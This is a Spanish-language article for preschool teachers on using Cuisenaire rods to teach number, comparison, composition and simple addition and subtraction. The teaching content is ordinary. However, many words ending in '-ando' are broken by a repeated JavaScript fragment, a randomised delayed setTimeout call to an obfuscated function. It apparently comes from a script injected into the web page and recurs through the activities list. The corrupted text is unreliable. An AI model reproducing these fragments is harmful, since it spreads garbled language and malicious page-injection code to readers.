REGLETAS CUISENAIRE EN LAS CLASES DE EDUCACIÓN INFANTIL

Autora: María Isabel Gamero Pardo

         Los docentes de Educación Infantil hemos de conseguir el pleno desarrollo de la personalidad de cada uno de nuestros alumnos; y, en el caso de la aproximación a la lógica-matemática, a desarrollar su pensamiento lógico, libre, creativo y autónomo.

         El desarrollo del pensamiento matemático no se puede obtener sin manipular el material en estas edades, puesto que nuestros alumnos han de tocar, sentir, experimentar y explorar para poder aprender.

         Nuestra labor como educadores será observar, coordinar, orientar y sugerir posibilidades; dejandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el protagonismo al propio alumno.

         Con ello, pretendemos provocar la aparición de actitudes de búsqueda, formar hábitos de iniciativa y lograr que nuestros niños encuentren estrategias para resolver situaciones. Así, aprovecharemos el interés por el juego que poseen nuestros alumnos para potenciar sus aprendizajes.

          Por tanto, la metodología que llevaremos a cabo para el aprendizaje de la lógico-matemática será aquella que propicie más la experiencia directa de los niños mediante la manipulación.

         Las regletas Cuisenaire es un método pedagógico que se utiliza frecuentemente en las aulas de educación infantil, la utilización de las regletas se realizan con la pregunta como soporte didáctico, ya que constantemente se pregunta a los niños y de esta forma se estimula la investigación de los alumnos ayudándoles a descubrir mediante la exploración.

          Este material se compone de 10 regletas de diferentes colores y tamaños. Este material al ser manipulativo nos va a permitir que los niños resuelvan los diferentes problemas que se plantean gracias a su propia experiencia, así irán adquiriendo el concepto de número más fácilmente que con la representación numérica aprendida de memoria.


 

Los OBJETIVOS que nos planteamos con este material van a ser entre otros:

  • Conseguir que los alumnos adquieran el concepto de número.
  • Facilitar el proceso de aprendizaje mediante la observación y la exploración.
  • Fomentar la creatividad de los alumnos.
  • Conseguir que los alumnos interactúen entre ellos favoreciendo así el dialogo y la discusión de su exploración.
  • Asociar la longitud con el color.
  •  Establecer equivalencias.
  •  Formar la serie numérica de 1 a 10.
  • Trabajar de forma manipulativa las relaciones “mayor que” y “menor que” de los números, teniendo en cuenta la comparación de longitudes.
  • Realizar distintas seriaciones.
  •  Introducir la composición y la descomposición de números.
  •  Iniciar las operaciones de suma y resta de forma manipulativa.

 

Los CONTENIDOS que podemos trabajar con este material son:

  • Numeración básica, hasta el 10.
  • Descomposición de los números del 1 al 10.
  • Comparación de cantidades: de mayor a menor y viceversa.
  •  Formación de la serie numérica del 1 al 10.
  •  Nociones básicas de fracciones por comparación de dos regletas.
  • Conceptos de doble y mitad.

 

          Las ACTIVIDADES que se pueden realizar con nuestros alumnos de Infantil son diversas, entre las que podemos destacar:

  1. Primero les dejaremos a los niños las regletas para que las manipulen
  2. Les haremos preguntas diferentes sobre las regletas como “¿Qué color tienen?”, “¿Son todas iguales?”, “¿Cuáles son sus dos diferencias principales?”. Es importante que observemos las diferentes respuestas que nos dan los niños a las preguntas y respetaremos absolutamente todas las respuestas.
  3. Realizaremos diferentes juegos con ellas como mirar a ver cuál es la más larga o la más corta utilizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando así ya el concepto de largo o corto.
  4. Preguntar qué pasa si dos regletas son iguales que una sola (aquí utilizamos el concepto de igual o diferente).
  5. Escogeremos una regleta y los alumnos tendrán que buscar dos regletas que, uniéndolas, formen la que tenemos también se puede hacer a la inversa, buscandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando diferentes combinaciones entre ellas. De esta forma los alumnos se familiarizan con la composición y descomposición de los números
  6. Realizaremos diferentes actividades de este tipo para que los alumnos vayan observandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, explorandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando, investigandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando etc., con las regletas.
  7. Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ya las han explorado bien, se va a pasar a decirles la equivalencia numérica que tienen:
  8. Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ya se han presentado los alumnos formarán la serie numérica.
  9. Pasarán también a jugar libremente con nuestra observación, para que así ellos puedan establecer equivalencias.
  10. Una vez que ya saben la equivalencia se pueden realizar fichas con los números escrito. Haciendo de este modo correspondencias entre el número y el color. En estas fichas primeramente puede aparecer un numero para que los alumnos lo rellenen del color de la regleta así si aparece un dos lo tendrán que colorear de color rojo, después pasaremos a mezclarlo todo apareciendo por un lado regletas y por el otro números. Teniendo así multitud de posibilidades.
  11. También se pueden hacer fichas con seriación de regletas, ordenación, clasificación.
  12. Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ya se han realizado ejercicios como los que he citado podremos pasar a las sumas y restas con regletas introduciendo a las equivalencias que hemos realizado en las actividades anteriores los signos.

 

 La secuenciación para el trabajo con regletas es el siguiente: 

  1. Juego libre.
  2. Reconocimiento de tamaños.
  3. Seriaciones.
  4. Juego de equivalencias.
  5. Ordenación.
  6. Trabajar los conceptos de “doble y mitad”.

          Por tanto, es necesario que los niños conozcan la equivalencia de cada regleta con su número correspondiente; de tal forma que han de saber que: 

  • El 1 corresponde a la regleta blanca.
  • El 2 corresponde a la regleta roja.
  • El 3 corresponde a la regleta verde claro.
  • El 4 corresponde a la regleta rosa.
  • El 5 corresponde a la regleta amarilla.
  • El 6 corresponde a la regleta verde oscuro.
  • El 7 corresponde a la regleta negra.
  • El 8 corresponde a la regleta marrón.
  •  El 9 corresponde a la regleta azul.
  • El 10 corresponde a la regleta naranja.

         La forma de abordar estos contenidos, al igual que otros en el ámbito de la lógica-matemática, es de forma manipulativa.

          Los niños han de tocar, observar, comparar, agrupar, experimentar… de tal forma que puedan llegar a adquirir estos conceptos de una forma viva. Es decir, que lleguen a sentir que las regletas y su correlación numérica forma parte de su “mundo”. Un mundo que entiende de estímulos y sensaciones.

          De esta forma, lo que pretendemos es que nuestros alumnos aprendan a componer y descomponer números iniciándoles en las actividades de cálculo, sobre una base obviamente manipulativa.


 

 REFERENCIAS BIBLIOGRÁFICAS: 

  • LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207
  • DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.   
  • Gallego Ortega y varios: Enciclopedia de educación infantil. Volumen II. Ediciones Aljibe. Archidona (Málaga). 2003

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.